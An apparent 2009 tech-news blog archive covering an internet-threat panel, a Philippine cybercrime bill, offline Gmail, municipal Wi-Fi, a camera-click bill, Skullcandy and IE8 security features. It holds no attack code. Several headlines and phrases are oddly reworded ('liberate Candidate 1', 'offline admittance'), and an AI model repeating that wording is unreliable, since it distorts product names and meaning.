Such criminals use viruses to take control of computers, combine thousands of them into so-called "botnets" that are used for concerted cyber attacks.

In the United States, a "virtual" group had managed to hijack and redirect the details of 25 million credit card transactions to Ukraine. The group used the data to buy a large number of goods, which were then sold on eBay.

This suggested organisation on a huge scale.

"This is not vandalism anymore, but organised criminality," a panellist said, while another added that "this is it is not about technology, but our economy".

Threat #2: the system

A much larger problem, though, are flaws in the set-up of the web itself.

It is organised around the principle of trust, which can have unexpected knock-on effects.

Nearly a year ago, Pakistan tried to ban a YouTube video that it deemed to be offensive to Islam.

The country's internet service providers (ISPs) were ordered to stop all YouTube traffic within Pakistan.
However, one ISP inadvertently managed to make YouTube inaccessible from anywhere in the world.

But in cyberspace, nobody is responsible for dealing with such incidents.

It fell to a loose group of volunteers to analyse the problem and distribute a patch globally within 90 minutes.

"Fortunately there was no Star Trek convention and they were all around," a panellist joked.

Threat #3: cyber warfare

Design flaws are one thing, cyber warfare is another.

Two years ago, a political dispute between Russia and Estonia escalated when the small Baltic country came under a sustained denial-of-service attack which disabled the country's banking industry and its utilities like the electricity network.
This was repeated last year, when Georgia's web infrastructure was brought down on its knees during its conflict with Russia.

"2008 was the year when cyber warfare began.. it showed that you can bring down a country within minutes," one panellist said.

"It was like cyber riot, Russia started it and then many hackers jumped on the bandwagon," said another.

This threat was now getting even greater because of the "multiplication of web-enabled devices" - from cars to fridges, from environmental sensors to digital television networks.

The panel discussed methods that terrorists could use to attack or undermine the whole internet, and posed the question whether the web would be able to survive such an assault.

The real problem, concluded one of the experts, was not the individual loss.

It was the systemic risk, where fraud and attacks undermine either trust in or the functionality of the system, to the point where it becomes unusable.



What solution?

"The problems are daunting, and it's getting worse," said one of the experts. "Do we need a true disaster to bring people together?," asked another.

One panellist noted that unlike the real world - where we know whether a certain neighbourhood is safe or not - cyberspace was still too new for most of us to make such judgements. This uncertainty created fear.

And as "the internet is a global network, it doesn't obey traditional boundaries, and traditional ways of policing don't work," one expert said.

Comparing virus-infected computers to people carrying highly infectious diseases like Sars, he proposed the creation of a World Health Organisation for the internet.

"If you have a highly communicable disease, you don't have any civil liberties at that point. We quarantine people."

"We can identify the machines that have been co-opted, that provide the energy to botnets, but right now we have no way to sequester them."

But several panellists worried about the heavy hand of government. The internet's strength was its open nature. Centralising it would be a huge threat to innovation, evolution and growth of the web.

"The amount of control required [to exclude all risk] is quite totalitarian," one of them warned.

Instead they suggested to foster the civic spirit of the web, similar to the open source software movement and the team that had sorted the YouTube problem.

"Would a formalised internet police following protocols have been able to find the [internet service provider] in Pakistan as quickly and deployed a fix that quickly?" one of them asked.

How Soon Will Cybercrimes Be Punished?
In criminal offenses, there would be no crime when there is no law punishing it. That explains why various crimes done through the internet still persist these days. In cases where the offenders are caught, court proceedings won't go so well because only the part of the offense which is governed by the Revised Penal Code (RPC) is being litigated. The main bulk of the offense, the cybercrime, is usually left untouched. This is the main issue; yet, the current RPC is still inadequate to deal with such matter. Hence, the government's highest monitoring body for the conditions and status of Information Technology in the Philippines is now putting pressure on the legislature to propose a bill against cybercrimes.
The Commission on Information and Communication Technology (CICT) define cybercrimes as those offenses done in the realm of the internet which, just like usual offenses, have grave and concrete effects to the ones who are affronted. The crimes identified are hacking, identity theft, phishing, spamming, website defacement, denial-of-service (DoS) attacks, malware or viruses, child pornography, and cyber prostitution. Such crimes are not yet punishable under the country's criminal law. That is why there is a need for a legislative action to eventually make each of the aforementioned offenses become a felony in order for perpetrators to be punished in accordance with the law.
CICT is very hopeful that increased awareness and support will push the Congress to finally pass a bill against cybercrimes. The commission endorsed the "Cybercrime Prevention Act of 2008" wherein four cyber-related bills authored by different lawmakers are consolidated. A representative from the Council of Europe, an organ of the European Council, also joined the technical working group in refining the bill a year prior to the endorsement. Such representation is meant to "harmonize" the bill with European standards on cybersecurity. It has to be considered that such crimes are not solely confined to one nation but rather that they traverse territorial boundaries considering that the crimes are committed in the World Wide Web..
Currently, CICT feels that there is an increasing support from private sector groups. The Business Process Association of the Philippines (B/PAP) which represents the outsourcing industry is an example. The said umbrella organization supports such bill because it infers that once the country is secured from different forms of cybercrimes through existing and enforceable laws, it would be easier to sell the services that are done in the country to foreign investors. The bill would ensure that the clients are well covered when we speak of cybersecurity in the Philippines.
With these, it can be said that the current conditions the country is facing calls for progressive and up-to-date legislations. Neighboring countries like Singapore and Malaysia have already adopted such measure. Unluckily though, the bill is hampered by the other so called "more important" considerations discussed in both Lower and Upper House of the Congress in the Philippines. It is already five years since the bill was endorsed, yet, the Congress still fails to accommodate it. While increased support and awareness regarding cybercrimes becomes more apparent, hopefully ,the legislature will finally act on this issue.

Microsoft patent makes smart phones like more then pc


'Smart system' includes cradle that allows smart phone to connect to peripherals, networks, through a USB connection.

Microsoft Corp. has patented smart phone-docking technology that would allow the devices to connect to peripherals and networks similar to the way PCs do.

According to a filing with the U.S. Patent and Trademark Office, Microsoft has patented a "smart system" that includes a smart-phone cradle that allows the device to interface to peripherals, networks and large video displays through a USB connection.


Some of the peripherals the cradle would allow the smart phone to link up to include printers, TV screens, cameras, external storage devices and speakers, according to the patent, which Microsoft acquired Jan. 22.

For years Microsoft executives -- particularly Chairman Bill Gates, who is no longer on full-time duty at the company -- have discussed publicly how PCs and smart devices are reaching an intersection, and how PC technology will be available in smaller devices.

The patent filing reflects this notion. "The cell phone is rapidly evolving into a smart communications device that can provide sufficient computing power and functionality to drive a wide variety of peripherals as well as access network services," according to the filing. "A major impediment to taking advantage of this evolving technology in the cell phone, for example, is the inability to connect the phone to peripheral devices and systems."

Apple Inc.'s iPhone, introduced in mid-2007, was probably the first and best example of the intersection between PCs and smart phones; it's more like a mini-PC than a mobile phone. With devices based on the Windows Mobile operating system that third parties sell, Microsoft also offers a similar hybrid of PC and smart phone.

Microsoft also released a Zune music and video player to compete with Apple's iPod, but the device has garnered only lukewarm customer interest, leaving the future of the product uncertain. Rumors swirled that Microsoft would unveil a combination Zune/Windows Mobile device to rival iPhone at the Consumer Electronics Show in Las Vegas earlier this month, but that did not happen.

Microsoft did not immediately comment on the patent Friday. The company doesn't typically comment on technologies it patents, which may or may not end up as products or as a part of products Microsoft sells.

Thursday, January 29, 2009

Google's new online tools that will diagnose your network connection & performance.l

Google and a group of partners have released a set of tools designed to help broadband customers and researchers measure performance of Internet connections.
The set of tools, at MeasurementLab.net, includes a network diagnostic tool, a network path diagnostic tool and a tool to measure whether the user's broadband provider is slowing BitTorrent peer-to-peer (P-to-P) traffic. Coming soon to the M-Lab applications is a tool to determine whether a broadband provider is giving some traffic a lower priority than other traffic, and a tool to determine whether a provider is degrading certain users or applications.


Think your Internet Service Provider (ISP) is messing with your connection performance? Now you can find out, with Google's new online tools that will diagnose your network connection.
Here's a quick walkthrough on how to make the best of them.
Google's broadband test tools are located at Measurementlab.net. On that page, you'll see an first icon that says "Users: Test Your Internet Connection". Click that, and then you'll be taken to a page where there are three tests available, and two more listed as coming soon. However, out of the three available tests, only one of them is fully automated and easy to use.
Glasnost , second on the list, will check whether your ISP is slowing down (like Comcast) or blocking Peer2Peer (P2P) downloads from software such as BitTorrent. P2P apps are commonly used for downloading illegal software and media content like movies and music, but also are used for legal purposes as well, such as distributing large software packages to many users at once.
To use the measurement tool, you will be redirected to the Glasnost site. You'll need the latest version of Java installed, and you should stop any large downloads that you may have running before you begin the test. If you're on a Mac, a popup message will prompt you to trust the site's Java applet.
When you're ready to start, you can choose whether you want to run a full test (approximately 7 minutes long) or a simple test (4 minutes long). When I tried to test my connection, Glasnost's measurement servers were overloaded and an alternative server was offered, but that was overloaded as well. After a short while I was able to run the test.
In the tests of my connection (my provider is Vodafone At Home, in the UK) all results indicated that BitTorrent traffic is not blocked or throttled. But I'm looking forward to hearing from you in the comments how your ISP performed in Glasnost's diagnostics. Meanwhile, make sure you keep an eye on the other tests that will be available soon from Measurementlab.net.

Wednesday, January 28, 2009

Britannica reaches uncovered to the web



The Encyclopaedia Britannica has unveiled a plan to let readers help keep the reference work up to date.
Under the plan, readers and contributing experts will help expand and maintain entries online.
Experts will also be enrolled in a reward scheme and given help to promote their command of a subject.
However, Britannica said it would not follow Wikipedia in letting a wide range of people make contributions to its encyclopaedia.
User choice
"We are not abdicating our responsibility as publishers or burying it under the now-fashionable 'wisdom of the crowds'," wrote Jorge Cauz, president of Encyclopaedia Britannica in a blog entry about the changes.
He added: "We believe that the creation and documentation of knowledge is a collaborative process but not a democratic one."
Britannica plans to do more with the experts that have already made contributions. They will be encouraged to keep articles up to date and be given a chance to promote their own expertise.
Selected readers will also be invited to contribute and many readers will be able to use Britannica materials to create their own works that will be featured on the site.
However, it warned these would sit alongside the encyclopaedia entries and the official material would carry a "Britannica Checked" stamp, to distinguish it from the user-generated content.
Alongside the move towards more openness, will be a re-design of the Britannica site and the creation of the web-based tools that visitors can use to put together their own reference materials.

Hidalgo County, Texas is considering $500,000 project that would blanket the city with a wireless Internet system


Pharr is considering a $500,000 project that would blanket the city with a wireless Internet system geared toward serving city workers and emergency responders.
Negotiations are still in extremely preliminary stages — and both the city and contractor say a timetable isn't set — but leaders have expressed intrigue at the prospect of a system that can seemingly meet their wildest high-tech fantasies.
"The possibilities for the future are really interesting," Pharr City Manager Fred Sandoval said.
Bobby Vassallo, a wireless Internet consultant, has met with the City Commission twice over the last six weeks to help pitch the concept of a wireless Internet "clothesline" that could help the city handle everything from police video surveillance to wireless water meter-reading.
Behind the pitch is Brownsville businessman Oscar Garza, who leads the corporation Valley Wireless Internet Holdings.
Sandoval emphasized that the city hasn't made any decisions yet.
"It's a very interesting concept," he said. "We definitely want to be at the forefront."
REGION-WIDE
Pharr isn't alone in its consideration of wireless systems.
While wireless Internet is already the standard in some large cities, the technology now seems to be taking root in the Rio Grande Valley.
Cities across the region are pursuing high-tech, wireless Internet options that have the potential to promote efficiency in virtually all municipal departments by keeping workers in the field connected to City Hall.
Using wireless "mesh" systems, cities can provide Internet access over a large area to their employees through a series of nodes attached to structures like water towers or streetlights.
That means building inspectors could send reports back to City Hall from a work site, traffic citations could appear in court computers almost instantly, and police could set up surveillance cameras without fear of their cables being cut.
McAllen is already moving forward with plans to install up to 120 surveillance cameras throughout the city, which will be connected wirelessly to a fiber-optic cable running through the city.
The cameras would be served by a downtown wireless network, which could also provide support to other city workers in the area.
Last summer, a pilot program provided wireless to city workers in Bill Schupp Park. McAllen is currently soliciting proposals from vendors and is scheduled to meet with them today.
The focus of McAllen's project would be city usage, but eventually it could be opened up to residents, said Belinda Mercado, McAllen's information technology director.
Meanwhile, Hidalgo leaders are examining the possibility of creating a citywide blanket of wireless Internet similar to the one Pharr is examining. The system would provide access to emergency responders and residents on two separate networks, explained Rick Mendoza, Hidalgo's information technology director.
He said the talks are in preliminary stages and price estimates aren't available. But the city would like to offer Internet service to residents at no cost.
"We want to offer Internet service to members of our community who don't have the means of getting either DSL or cable," Mendoza said.
He added that a citywide wireless network would help Hidalgo compete with neighboring cities.
Edinburg leaders have also discussed the possibility of creating some sort of wireless system that would include various hot spots throughout the city, though they are only in discussions and the city hasn't started talks with any specific vendors.
Brownsville officials, meanwhile, expect their $6.6 million wireless project to be operational within four months, Mayor Pat Ahumada said.
The city is erecting signal towers, which will provide wireless access to city employees, utility workers and emergency responders, though it remains to be seen how much access the general public will have.
COST
The systems don't come cheap, however.
The network being pitched to Pharr could cost as much as $500,000 for the initial infrastructure, $25,000 a month to operate and even more for cameras, wireless water meters and other high-tech equipment needed to actually take advantage of the system.
At a time when cities across the region are struggling financially, at least some have questioned whether the cost of such an ambitious undertaking can be justified.
Pharr is just starting to climb out from under its financial woes after it wiped out its reserves last year.
"I believe the No. 1 question we should be asking, besides ‘Can we afford this?' is ‘Do we need it?'" said Pharr Finance Director Juan Guerra at a city workshop earlier this month. "From what I'm hearing ... I'm not sure if we do."
TIMING
Interestingly, the Valley's pursuit of wireless comes as cities elsewhere are struggling with their Wi-Fi projects.
Internet service provider Earthlink, which has partnered with Philadelphia, Houston and other large cities on wireless programs, announced layoffs within its municipal division in November. The company told shareholders it no longer makes sense for Earthlink to invest in municipal wireless.
As a result, some community wireless projects have been put on hiatus.
Earlier in the decade, companies like Earthlink offered to provide wireless systems at virtually no cost to cities. In exchange, the networks were privately owned, and the companies could charge subscription fees to consumers or hit them with advertising.
That model is changing, as it has become apparent that broadband access is becoming more readily available and affordable to consumers.
Today, cities are designing the systems for themselves to meet their own needs, such as giving support to emergency workers or keeping public works employees connected while in the field.
Those purpose-driven networks — as opposed to ones that are simply designed to give residents Internet access — are the ones that are now poised to succeed, writes Governing magazine's Christopher Swope, an expert on municipal wireless systems.
Vassallo, the wireless Internet consultant, emphasized to Pharr leaders that the city could create some public hot spots, but providing all-encompassing Internet service to residents isn't worth the cost or stress to the city.
Regardless of how, exactly, Pharr and other cities' projects takes shape, advocates say it's high time the Valley embraces wireless.

Tuesday, January 27, 2009

Google will begin to offer browser-based offline contact to its Gmail Webmail application

Google announced the release of a new system which allows users to access their accounts offline.
Google Delivers Offline admittance for Gmail
Google will begin to offer browser-based offline access to its Gmail Webmail application, a much-awaited feature.
This functionality, which will allow people to use the Gmail interface when disconnected from the Internet, has been expected since mid-2007.
That's when Google introduced Gears, a browser plug-in designed to provide offline access to Web-hosted applications like Gmail.
Gears is currently used for offline access to several Web applications from Google, like the Reader RSS manager and the Docs word processor, and from other providers like Zoho, which uses it for offline access to its e-mail and word processing browser-based applications.
Rajen Sheth, senior product manager for Google Apps, said that applying Gears to Gmail has been a very complex task, primarily because of the high volume of messages accounts can store. "Gmail was a tough hurdle," he said.
Google ruled out the option of letting users replicate their entire Gmail inboxes to their PCs, which in many cases would translate into gigabytes of data flowing to people's hard drives. It instead developed algorithms that will automatically determine which messages should be downloaded to PCs, taking into consideration a variety of factors that reflect their level of importance to the user, he said. At this point, end-users will not be able to tweak these settings manually.
"We had to make it such that we're managing a sizable amount of information offline and doing it well in a way that's seamless to the end-user," he said.
For example, in Gmail, users can put labels on messages, as well as tag them with stars to indicate their importance, and Google can use that information to determine which messages to download. Sheth estimates that in most cases Gmail will download several thousand messages, preferring those that are more recent as well. Depending on the amount of messages users have on their accounts, they may get downloads going back two months or two years, he said.
Google will begin to roll out the Gmail offline functionality Tuesday evening and expects to make it available to everybody in a few days, whether they use Gmail in its standalone version or as part of the Apps collaboration and communication suite for organizations.
While the feature was "rigorously" tested internally at Google, it is a first, early release upon which Google expects to iterate and improve on. That's why it's being released under the Google Labs label. Users are encouraged to offer Google feedback.
Users have been able to manage their Gmail accounts offline via other methods for years, since Gmail supports the POP and IMAP protocols that let people download and send out messages using desktop e-mail software like Microsoft Outlook and others.
However, the Gears implementation will let people work within the Gmail interface without the need for a separate PC application. When offline, messages will be put in a Gears browser queue, and the desktop and online versions of the accounts will be synchronized automatically when users connect to the Internet again. This will come in handy for people who travel a lot and often find themselves without Internet access, Sheth said.
To activate the offline functionality, users of standalone Gmail service and the standard Apps edition should click "settings" after logging on to their Gmail account. There, they should click on the "Labs" tab, select "Enable" next to "Offline Gmail" and click "Save Changes." A new "Offline" link will then appear in the right-hand corner of the account interface. Users of the Education and Premier Apps versions will
have to wait for their Apps administrators to enable Gmail Labs for everyone on the domain first.
Google is also rolling out Gears-based offline access for its Calendar application. However, it will be for now read-only and exclusively available to Google Apps account holders. Previously, Google introduced read-only offline access to the Spreadsheet and Presentation applications in Google Docs, which is also part of Google Apps.

release of offline Gmail.

The early version of the app is available now to users with the U.S./U.K. English version of Google Labs.
Pegged as an "experimental" feature, the app is aimed at maintaining Gmail's functionality even when you're not online. Built on Google's Gear's platform, once enabled the feature downloads a cache of your mail to your PC. When you're logged on the Web, it syncs the cache with the Gmail servers.
While you're offline, you can read, star, and label messages. If you send a message when you're offline, Gmail places it in your outbox and sends it as soon as you log back in. A special "flaky connection" setting splits the difference between on and offline modes ("when you're 'borrowing' your neighbor's wireless," says Google), utilizing a local cache while syncing it with the online version.

"Camera Phone Predator Alert Act" to protect citizens from being photographed illegally, without us knowledge


Congress Intros Bill to Force Cell Camera Sounds
The Camera Phone Predator Alert Act (H.R. 414) is the real deal. Fresh off the legislative desk of New York Representative Peter King (R), the bill--currently cosponsored by goose egg--would require an audible tone to accompany all cellular phones with an installed camera that are created in the U.S. This tone, likely a clicking noise of some sort, would sound, "within a reasonable radius of the phone whenever a photograph is taken with the camera in such phone." And don't think that evildoers would be able to conceal their predatory ways by flicking an iPhone-style audio toggle switch. Any mobile phones built after the bill becomes a law would be prohibited from including any way to eliminate or reduce the volume of said noise.
Camera Click Sound to be Legal Requirement
The draft of the legislation also mentions that the click sound should be audible within a sensible" distance.
The US is reportedly readying the "Camera Phone Predator Alert Act" to protect citizens from being photographed illegally, without their knowledge.While the topic has been mulled over for years, it is only now that the country is planning to put forth a legislation to make the camera click sound audible when a picture is clicked. While some cell phone manufacturers already have compliant devices in place, there are others where simply putting the phone into silent mode would let voyeuristic photography go undetected. Even for those phones on which the camera click sound cannot be turned off, users have been able to hack into the phone's firmware and remove the sound.The proposed bill would fall under the domain of the Consumer Product Safety Commission and is expected to be provided the status of a "safety requirement". Additionally, the draft of the legislation also mentions that the click sound should be audible within a "reasonable" distance.Similar laws are already in place on countries like Japan and Korea and most device manufacturers have been able to comply with the same.


Micro Camcorder - 'World's Smallest'
Things are getting ever smaller. If you doubt this, just check out the Micro Camcorder - a spy camera developed by Spy Gadget. The camcorder has claimed the spot for the 'World's Smallest Camcorder'.

The camcorder is so small that it can be hidden in a chewing-gum pack. It's a one touch record function and records videos at 15 fps (frames per second). The captured video is stored on a flash microSD card. It has built-in batteries and charges via USB. The camera can record video for over 30 hours with a 1GB card installed. The price quoted for the taking is USD 295 (Rs.11,800).


Monday, January 26, 2009

The world's best coolest ear buds

Skullcandy veered away from standard-issue black and white headphones - and struck gold.
Skullcandy is using fake alligator skin and rhinestones to shake up the headphone market, giving Philips and Sony a run for their money.

The half pipe tucked in a corner of the office is the first clue that Skullcandy is not your average company.
Other clues: In the teeth of the worst recession in generations, the five-year-old private company is growing like a weed. And it just scored a round of funding, from private-equity shop Goode Partners, at a time when investment dollars are scarce.
If the name Skullcandy doesn't register, it will with your kids (so will the term half pipe, which is a ramp, in this case for skateboarding, shaped like a pipe cut in half lengthwise).
Skullcandy's business is headphones, and they dominate the 12- to 25-year-old demographic with a line-up of gear covered in faux gator skin, gold foil, rhinestones and hip hop-inspired graphics. Pull back the hoody on any kid riding a snowboard in Park City, Utah and chances are pretty good, a pair of Skullcandy headphones, probably the top-selling "Smokin' Buds," will be pumping music into their ears.
Making electronics cool
From a distant No. 10 three years ago, Skullcandy is now North America's third-largest manufacturer of headphones by unit sales, behind consumer electronics giants Philips Electronics (PHG) and Sony (SNE), according to NPD Group. "We'll be No. 2 soon," predicted Skullcandy president Jeremy Andrus, legs dangling from the office half pipe. "My guess is some time next year."
After that, Skullcandy and the band of snowboarders, skaters, surfers and DJs that founder Rick Alden has assembled in Park City, will be gunning for No. 1. That is, if Alden, the CEO and creative madman to Andrus' operations guru, can figure out a way to do it without diluting the company's cool factor.
Skullcandy didn't invent headphones; what the company has done is make them into a fashion item. Kids don't want one pair, they want five. "We're like sunglasses," Alden said. "Except we sit on top of your head, and you wear them a lot more."
Skullcandy headphones are not the type you will hear audiophiles gushing about. They are mostly solid-sounding pieces of affordable gear that, unlike Sony's grey and black headphones, or Apple's white, don't disappear into the background. On the contrary, they make a statement. The snowboard, surf and skate inspired graphics and colors ask for attention, and speak to a lifestyle, or in most cases, a wannabe lifestyle.
Successful clothing brands are able to evoke that lifestyle magic, but it is the rare consumer electronics company that does it. Apple (AAPL, Fortune 500) with its iPod is the obvious and most successful current example. Skullcandy has pulled it off so far, and in doing so sent revenue from essentially zero to approaching $100 million in just a few years. Sales more than doubled in 2008.
To put in perspective Skullcandy's momentum, when many consumer electronics companies saw sales fall off a cliff in November, Skullcandy's quadrupled year over year, according to Andrus.
That success is obviously gratifying to Alden, but it also has him worried about overexposure. "I was at the mountain riding with my son the other day, and everyone I saw was wearing Skullcandy headphone, I mean they were everywhere," Alden said. "I may go back to wearing black Sony's just to be different."
He's kidding, but his concern is real. Alden and his design team need to keep Skullcandy fresh, so it doesn't fall out of fashion and black becomes the new black. Fortunately the Skullcandy team has a secret weapon when they seek inspiration, design-wise and business-wise.
"We head to the mountain," Alden said, checking for the latest snowfall report on his laptop. "No good ideas ever come from sitting in an office, not around here at least."

more...

The Potential of Earbuds
There is great disagreement about:
Whether earbuds could potentially sound good, given their small size.
Whether any actual earbuds sound good, or whether the whole idea needs further development.
Which earbuds sound good and which sound bad.
Which of the expensive ($40-$80) earbuds sound so good that the extra cost is justified.

After testing many headphones and earbuds and applying my extensive experience tweaking equalizers, I think that earbuds actually have the potential to sound even *better* than standard headphones. In any case, all headphones and earbuds need a new approach: a calibrated equalization curve built into the player, to yield flat response. Megabass is a step toward such a compensation curve.
Like the Etymotics, earbuds have the potential to have smoother response than even the best popular standard headphones, such as the Sennheiser 580's. I've dialed in some truly vibrant, open sound using equalization together with $10 earbuds. It is easy and straightforward to equalize earbuds; just do anti-rolloff to a greater or lesser degree, and leave the rest flat; there aren't mysterious jags hidden along the entire spectrum that need unique shapes of compensation. I'd rather trust my ears than the common assumption that earbuds are inferior. If the conditions are right and the appropriate, ordinary EQ compensations are made, earbuds can be superior, rather than inferior, to good standard headphones. It's simply a matter of starting with a decent earbud driver, and providing the inverse of the earbud driver's frequency response.
If someone shows me a measured response curve of an earbud and it's rough and jagged, I will change my view somewhat, but in any case, I think that eq-compensated earbuds at least *can sound* unusually smooth and natural. Players need more fancy curves to compensate for specific earbud models.
"Though I like the R3 stock earbuds even better than the 888's, I can't stop seeking for even better sound, as I believe it can be a lot better. If I press against an earbud I get very powerful bass, so it is possible. I will keep on looking, and if I find something interesting I will let you know. Please let me know your findings on this matter." (from a private email to me)
Some people haven't been lucky and haven't heard the one or two models that are really good. No wonder they think earbuds are a poor packaging and sound poor. I was starting to suspect that *some* Sony stock earbuds (included with the player) sound great, and some sound lousy.

Internet Explorer 8 Focuses on better Security and Privacy

Some of the features of liberate Candidate 1, now existing to the public, are similar to functionality that’s already included in Firefox 3.
Microsoft's updated browser, Internet Explorer 8, promises an assortment of new features designed to help make Web browsing with IE safer, easier, and more compatible with Internet standards. We looked at the first release candidate of the new browser released to the public today, Release Candidate 1 (RC1). On the surface, IE 8 seems to be a lot like IE 7, but Microsoft has made a number of changes under the hood. You may have seen some of these new features already, however, in IE's no-longer-upstart competitor, Mozilla Firefox 3.
Tabbed Browsing

If you accidentally close a browser window in IE 8, you can opt to restore it when you reopen the program (just as you can in Firefox). IE 8 will use color coding to group related tabs together. If you open a link from pcworld.com in a new tab, for example, it will open adjacent to the original tab, and the tabs themselves will have a matching color. You can move tabs from one group to another, but if you have three unrelated pages open, you cannot create a group out of them.
Perhaps the most novel addition in IE 8 is what Microsoft calls tab isolation. The feature is designed to prevent a buggy Web site from causing the entire Web browsing program to crash. Instead, only the tab displaying the problematic page will close, so you can continue browsing.
Of course, IE 8 RC1 retains some of the features introduced in the first beta, including WebSlices and accelerators; see "Updated Web Browsers: Which One Works Best?" for more details.
Searching

IE 8 can use multiple search engines besides Windows Live Search, and you can add other search engines to the mix. Also, IE 8 will give you search suggestions as you type. For example, I can type in 'PC World' into the search field, and IE 8 RC1 will give me Live Search suggestions such as 'pc world magazine' or 'pc world reviews'. In addition, IE 8 lets you switch between search engines on the fly by clicking an icon at the bottom of the search field's drop-down menu. IE 8 can search Yahoo and Ask.com, and you can install add-ins that give IE 8 the capability to search Wikipedia, Amazon, and the New York Times, among other sites.
Improved Security
Microsoft touts IE 8 as its most secure browser to date, and Microsoft has indeed added a good number of security features to the mix, ranging from phishing detection to private browsing, plus a new feature to prevent clickjacking, an emerging data theft threat.
IE 8 RC1 includes two security features under the 'InPrivate' label: InPrivate Browsing and InPrivate Filtering. Both existed in earlier prerelease versions of IE 8, but IE 8 RC1 lets you use the two features separately, whereas before each relied on the other.
If you enable IE 8's InPrivate Browsing feature, the browser will not save any sensitive data--passwords, log-in info, history, and the like. Afterward it will be as if your browsing session had never happened. This feature is very similar to Private Browsing in Apple's Safari browser, except that an icon in IE's address bar makes InPrivate Browsing's active status more obvious.
InPrivate Filtering--called InPrivate Blocking in earlier IE 8 builds--prevents sites from being able to collect information about other Web sites you visit. This feature existed in IE 8 Beta 2, but you could use it only while using InPrivate Browsing. In RC1, you can use InPrivate Browsing at any time.
The browser's phishing filter--called SmartScreen--improves on its predecessor's filter with such features as more-thorough scrutiny of a Web page's address (to protect you from sites named something like paypal.iamascammer.com) and a full-window warning when you stumble upon a suspected phishing site. SmartScreen relies largely on a database of known phishing sites, so new, unknown phishing sites may slip through the cracks.
IE 8 displays sites' domains in a darker text color, so you can more readily see whether you're visiting a genuine ebay.com page, say, or a page simulating an eBay page on some site you've never heard of. Microsoft could still put a little more emphasis on the domain name (using a different color background, for example), but the highlighting is a welcome addition.
Finally, IE 8 RC1 includes a feature designed to prevent clickjacking, a method in which Web developers insert a snippet of HTML code into their Web page code to steal information from Web page visitors. When you use IE 8 to view such a page, IE 8 can identify an attempted clickjacking and will warn you of the attempt.
Web Compatibility
Creating a site that looks identical in Internet Explorer, Firefox, and Safari can be a challenge. IE 8 Beta 2 offers better support for W3 Web standards--a set of guidelines developed to ensure that a Web page appears the same in all browsers. The downside is that IE 8 will break some pages designed for earlier Internet Explorer versions.
To counteract this problem, Microsoft has added a compatibility mode: Click a button in the toolbar, and IE 8 will display a page in the same way that IE 7 does. In my testing, I found that most pages worked fine with the standard (new) mode, and that most errors were minor cosmetic ones. Unfortunately, the Compatibility Mode toggle button may not be obvious to most users, because it's pretty small; a text label would have helped.
Though it probably won't convince many Firefox users to jump ship, Internet Explorer 8 Release Candidate 1 shows promise, and may be worth considering for people who have not yet solidified their browser loyalties. (Keep an eye out for our report on the final release of IE 8.)
See more like this: internet explorer, browser security, online privacy.
more....
Microsoft on Monday released a near-final "release candidate" version of Internet Explorer 8, the next version of its Web browser.
The software maker plans to say more on its Web site around noon, but, as noted by enthusiast site Neowin, the code is already available from Microsoft's download center.


With IE 8, Microsoft is hoping to regain some lost ground by adding features such as private browsing, improved security, and a new type of add-ons, called accelerators.
On the security front, Microsoft is adding a cross-site scripting filter, as well as protections against a type of attack known as clickjacking.
In an interview, IE General Manager Dean Hachamovitch said there will be little change between the release candidate and the final version, though he declined to say when the final version will be released.
"The ecosystem should expect the final candidate to behave like the release candidate," Hachamovitch said.
Internet Explorer 8 will work with Windows XP (Service Pack 2 or later) and Windows Vista. A version of IE 8 is also being built into Windows 7.
However, the IE code in Windows 7 is a pre-release candidate version.
"Windows 7 enables unique features and functionality in Internet Explorer 8 including Windows Touch and Jump Lists which require additional product tests to ensure we are providing the best Windows experience for our customers," the software maker said in a statement. "Microsoft will continue to update the version of Internet Explorer 8 running on Windows 7 as the development cycles of Windows 7 progress.